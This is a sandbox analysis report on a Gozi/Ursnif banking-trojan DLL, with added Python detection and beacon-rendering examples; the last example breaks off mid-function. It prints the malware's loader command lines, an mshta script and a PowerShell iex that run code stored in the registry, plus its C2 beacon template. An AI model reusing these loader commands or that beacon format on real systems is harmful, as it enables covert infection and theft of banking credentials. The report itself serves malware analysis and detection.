
Analysis Report earmarkavchd

Overview

General Information

Sample Name: earmarkavchd (renamed file extension from none to dll)
Analysis ID: 321067
MD5: 78b3444199a2932805d85cfdb30ad6fb
SHA1: a1826a8bdd4aa6fc0bf2157a6063cca5534a3a46
SHA256: 66eaf5c2bc2ec2a01d74db9cc50744c748388cd9b0fa1f07181e639e128803ef

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Gozi e-Banking trojan
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w10x64
  • loaddll32.exe (PID: 4396 cmdline: loaddll32.exe 'C:\Users\user\Desktop\earmarkavchd.dll' MD5: 62442CB29236B024E992A556DA72B97A)
    • control.exe (PID: 6996 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5504 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6110.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 7088 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 2072 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\6110.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • iexplore.exe (PID: 3884 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5928 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6328 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6788 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:82964 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 7064 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7164 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5352 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6548 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6916 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "126", "system": "4ccebe99a7438fb71ee5005fa7d4ea12hh", "size": "200775", "crc": "2", "action": "00000000", "id": "2200", "time": "1605897653", "user": "1082ab698695dc15e71ab15c9ed3ab41", "hash": "0xc0ebb23d", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
(23 entries in total; the first five are shown here. The Strings column is empty for these rule hits.)

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started; Author: Joe Security
Data:
  Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
  CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
  CommandLine|base64offset|contains: zw
  Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessId: 7164
  ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
  ProcessId: 5352
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag
Data:
  Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
  ParentImage: C:\Windows\System32\mshta.exe
  ParentProcessId: 7064
  ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  ProcessId: 7164
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth
Data:
  Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
  CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
  CommandLine|base64offset|contains: zw
  Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentProcessId: 7164
  ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'
  ProcessId: 5352
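The three Sigma hits above, together with the powershell-reads-registry-then-iex step and the nslookup external-IP check from the process tree, re-implemented as an added detection example. This is not the published Sigma rules and not Joe Sandbox code; the rule logic only approximates the public rules named above, and the field names, shell list and matching thresholds are this example's own. The events are constructed from this report's process tree (PIDs, images and command lines as listed there; a parent PID of 0 marks nodes the tree draws without a parent).

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event, as a SIEM would receive it (hypothetical schema)."""
    pid: int
    image: str
    cmdline: str
    parent_pid: int = 0
    parent_image: str = ""


# Interpreter images that should not normally be children of mshta.exe.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "sh.exe", "bash.exe"}
# Writable user/system scratch folders a legitimate build does not compile from.
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def mshta_spawning_shell(e: ProcEvent) -> bool:
    return _name(e.parent_image) == "mshta.exe" and _name(e.image) in SHELLS


def csc_from_temp(e: ProcEvent) -> bool:
    return _name(e.image) == "csc.exe" and any(d in e.cmdline.lower() for d in TEMP_DIRS)


def powershell_iex_from_registry(e: ProcEvent) -> bool:
    """Script body pulled out of a registry value and fed to Invoke-Expression."""
    c = e.cmdline.lower()
    return (_name(e.image) == "powershell.exe"
            and re.search(r"\b(iex|invoke-expression)\b", c) is not None
            and re.search(r"\b(gp|get-itemproperty)\b", c) is not None
            and ("hkcu:" in c or "hklm:" in c))


def nslookup_external_ip(e: ProcEvent) -> bool:
    """External IP discovery via OpenDNS, as seen in the tree above."""
    return _name(e.image) == "nslookup.exe" and "myip.opendns.com" in e.cmdline.lower()


RULES = {
    "mshta_spawning_shell": mshta_spawning_shell,
    "csc_from_temp": csc_from_temp,
    "powershell_iex_from_registry": powershell_iex_from_registry,
    "nslookup_external_ip": nslookup_external_ip,
}


def detect(events):
    """Return (rule name, pid) for every event that trips a rule."""
    return [(name, e.pid) for e in events for name, rule in RULES.items() if rule(e)]


# Constructed from the process tree of this report.
EVENTS = [
    ProcEvent(4396, r"C:\Windows\System32\loaddll32.exe", r"loaddll32.exe 'C:\Users\user\Desktop\earmarkavchd.dll'"),
    ProcEvent(6996, r"C:\Windows\System32\control.exe", r"C:\Windows\system32\control.exe -h", 4396, r"C:\Windows\System32\loaddll32.exe"),
    ProcEvent(3472, r"C:\Windows\explorer.exe", "", 6996, r"C:\Windows\System32\control.exe"),
    ProcEvent(5504, r"C:\Windows\System32\cmd.exe", r"cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6110.bi1'", 3472, r"C:\Windows\explorer.exe"),
    ProcEvent(7088, r"C:\Windows\System32\nslookup.exe", "nslookup myip.opendns.com resolver1.opendns.com", 5504, r"C:\Windows\System32\cmd.exe"),
    ProcEvent(3884, r"C:\Program Files\Internet Explorer\iexplore.exe", r"'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding"),
    ProcEvent(7064, r"C:\Windows\System32\mshta.exe", r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'"),
    ProcEvent(7164, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))", 7064, r"C:\Windows\System32\mshta.exe"),
    ProcEvent(5352, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'", 7164, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(6548, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP'", 5352, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"),
    ProcEvent(6916, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'", 7164, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
]

if __name__ == "__main__":
    for name, pid in detect(EVENTS):
        print(f"{name}: pid {pid}")
```

Note that cvtres.exe also has a Temp path on its command line but is not flagged: the compiler, not its resource converter, is the signal, and keying on the image name keeps the rule from firing on every child of a build.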

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: earmarkavchd.dll; Avira: detected
Found malware configuration
Source: loaddll32.exe.4396.0.memstr; Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "126", "system": "4ccebe99a7438fb71ee5005fa7d4ea12hh", "size": "200775", "crc": "2", "action": "00000000", "id": "2200", "time": "1605897653", "user": "1082ab698695dc15e71ab15c9ed3ab41", "hash": "0xc0ebb23d", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: earmarkavchd.dll; ReversingLabs: Detection: 45%
Machine Learning detection for sample
Source: earmarkavchd.dll; Joe Sandbox ML: detected
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_02828A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_02828A61
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_02826E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_02826E86
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_02813DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_02813DEE
Source: C:\Windows\explorer.exe; Code function: 29_2_03B791A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,29_2_03B791A0
Source: C:\Windows\explorer.exe; Code function: 29_2_03B537B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,29_2_03B537B8
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_02831C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_02831C05

Networking:

Creates a COM Internet Explorer object (CLSID {0002DF01-0000-0000-C000-000000000046} is InternetExplorer.Application)
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp; String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: loaddll32.exe, 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp; String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp; String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp; String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp; String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp; String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp; String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Uses nslookup.exe to query domains
Source: unknown; Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
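An added example (not part of the Joe Sandbox report, and not the bot's own code) that ties the memory strings above to the extracted configuration and to the HTTP traffic captured in this section. It does two things: it fills the C-style beacon template found in memory (soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x) with the values from the Malware Configuration block, and it scores URLs for the encoded beacon paths seen in the captured requests. Assumptions, all the example's own: the bot encrypts the rendered query before encoding it into the URL path, so the plaintext below is not what appears on the wire, and nothing here tries to decrypt the captured paths (the extracted config holds no key); the _2B, _2F and _0A_0D tokens are treated as stand-ins for base64 '+', '/' and a line break; the segment-count and length thresholds are heuristics tuned to the paths in this report. The C2 host list is taken from this section; the benign URL is constructed.

```python
import re
from urllib.parse import urlsplit

# Configuration as extracted by the report's Malware Configuration Extractor.
CONFIG = {
    "server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "126",
    "system": "4ccebe99a7438fb71ee5005fa7d4ea12hh", "size": "200775", "crc": "2",
    "action": "00000000", "id": "2200", "time": "1605897653",
    "user": "1082ab698695dc15e71ab15c9ed3ab41", "hash": "0xc0ebb23d", "soft": "3",
}

# Template recovered from the bot's memory strings (see "Found Tor onion address" above).
BEACON_FMT = "soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x"


def render_beacon(cfg: dict, fmt: str = BEACON_FMT) -> str:
    """Fill the template the way a C printf would. The 128-bit user id is printed
    as four %08x words, so the 32 hex digits of cfg['user'] are split in fours."""
    user = cfg["user"]
    if not re.fullmatch(r"[0-9a-f]{32}", user):
        raise ValueError("user id must be 32 lowercase hex digits")
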